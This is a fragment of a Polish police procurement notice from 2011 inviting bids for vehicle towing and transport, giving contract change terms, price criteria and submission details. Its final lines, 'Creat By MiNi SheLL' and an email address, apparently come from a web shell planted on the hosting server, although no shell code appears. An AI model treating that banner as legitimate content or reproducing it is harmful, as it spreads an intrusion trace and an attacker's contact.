a)podpisany lub zaparafowany przez Wykonawcę lub osobę uprawniona do reprezentowania Wykonawcy - Projekt Umowy - zał. nr 5 do SIWZ wzór wspólny dla wszystkich części (zaleca się wypełnienie Projektu umowy w części dotyczącej Wykonawcy i jego oferty) - nie jest wymagane załączanie Projektu umowy do oferty. W sytuacji braku w ofercie Projektu Umowy Zamawiający uzna,  że Wykonawca zapoznał się z jego treścią i akceptuje zawarte w nim warunki (na podstawie oświadczenia zawartego w pkt 8 Formularza ofertowego).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy zgodnie z art. 144 ust.1 ustawy P.z.p.  w stosunku do treści oferty (poprawienie omyłki pisarskiej, omyłki rachunkowej). Wszelkie zmiany wymagają zgody obu stron i formy pisemnej w postaci aneksu pod rygorem nieważności:
Warunki zmiany:
a) błędy pisarskie lub oczywiste omyłki rachunkowe w treści umowy;
b) zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę w przypadku braku 
możliwości świadczenia winy przez dotychczasowego podwykonawcy;
c) zmiana wynagrodzenia brutto w zakresie kwoty VAT w przypadku urzędowej zmiany stawki podatku VAT,
d) w przypadku braku środków na realizację zadania lub wystąpienia innych nie przewidzianych przyczyn Zamawiający dopuszcza możliwość przesunięcia w formie aneksu do umowy ostatecznego terminu realizacji przedmiotu umowy lub rezygnacji z części usług.
2. Jeżeli występują zmiany w strukturze organizacyjnej Zamawiającego lub Wykonawcy, dotyczące określonych  w umowie nazw, adresów, podległości, rachunków bankowych oraz wykazu osób i numerów telefonów  kontaktowych Strony niezwłocznie informują pisemnie o tych zmianach. Zmiany takie nie wymagają formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubuska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Poilicji w Gorzowie Wlkp., Zespół ds Zamówień Publicznych, ul Kwiatowaa10; 66-400 Gorzów Lkp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2011 godzina 12:00, miejsce: Komenda Wojewódzka Policji w Gorzowie Wlkp. Zespół ds Zamówień Publicznych, ul. Kwiatowa 10; 66-400 Gorzów Wlkp..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Nie dotyczy finansowania ze środków Uni Europejskiej. 
2. a) Cena - waga 100% w tym;
K1-CENA RYCZAŁTOWA - Dojazd do miejsca postoju, załadunek i rozładunek oraz holowanie i przewóz pojazdu samochodowego o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t 65% /65pkt. 
K2- CENA RYCZAŁTOWA - Dojazd do miejsca postoju, załadunek i rozładunek oraz holowanie i przewóz pojazdu samochodowego o dopuszczalnej masie całkowitej przekraczającej 3,5 t, a nie przekraczającej16t. 5% /5pkt. 
K3-CENA RYCZAŁTOWA - Dojazd do miejsca postoju, załadunek i rozładunek oraz holowanie i przewóz pojazdu samochodowego o dopuszczalnej masie całkowitej przekraczającej 16t. 15% /15pkt. 
K4-CENA RYCZAŁTOWA - Dojazd do miejsca postoju, załadunek i rozładunek oraz przewóz rowerów, motocykli, części samochodowych i motocyklowych, pojazdów trójkołowych lub czterokołowych pojazdów samochodowych o masie całkowitej nie przekraczającej 550 kg. 5% /5pkt. 
K5-Dojazd do miejscapostoju pojazdu, załadunek i rozładunek oraz holowanie pojazdu o dopuszczalnej masie całkowitej nie
przekraczającej 3,5 t poza teren obowiązującej umowy - stawka za 1 km holowania po przekroczeniu obszaru terytorium. 3% /3 pkt. 
K6-Dojazd do miejsca postoju pojazdu, załadunek i rozładunek oraz holowanie pojazdu o dopuszczalnej masie całkowitej przekraczającej 3,5 t, a nie przekraczającej 16t poza teren obowiązującej umowy - stawka za 1 km holowania po przekroczeniu obszaru terytorium.3% /3 pkt. 
K7 - Dojazd do miejsca postoju pojazdu, załadunek i rozładunek oraz holowanie pojazdu o dopuszczalnej
masie całkowitej przekraczającej 16 t poza teren obowiązującej umowy -stawka za 1 km holowania po przekroczeniu obszaru terytorium.3% /3 pkt. 
K8 - Dojazd do miejsca postoju pojazdu, załadunek i rozładunek
oraz holowanie pojazdu o dopuszczalnej masie całkowitej nie przekraczającej 550 kg poza teren obowiązującej umowy -stawka za 1 km holowania po przekroczeniu obszaru terytorium.1% /1.
3.Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art. 9 ust. 1 ustawy P.z.p.) w języku polskim (art. 9 ust. 2 ustawy P.z.p.).
4. Wszelkie zapytania dotyczące postępowania o udzielenie zamówienia należy kierować w godzinach urzędowania Zamawiającego tj: od godziny 7:30 do 15:30 w dni robocze, na adres Zamawiającego - ul. Kwiatowa 10, 66-400 Gorzów Wlkp., Zespół ds. Zamówień Publicznych 
e-mail: kwp_gorzow.zamowienia@lubuska.policja.gov.pl lub  fax 095/738 14 35. 
Uwaga: W przypadku dostarczenia dokumentu po godzinach urzędowania - Zamawiający uzna, że zapoznał się z jego treścią w następnym dniu roboczym.
5. Zamawiający dokona otwarcia ofert w dniu 18.04.2011r., o godz. 12:15 w swojej siedzibie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com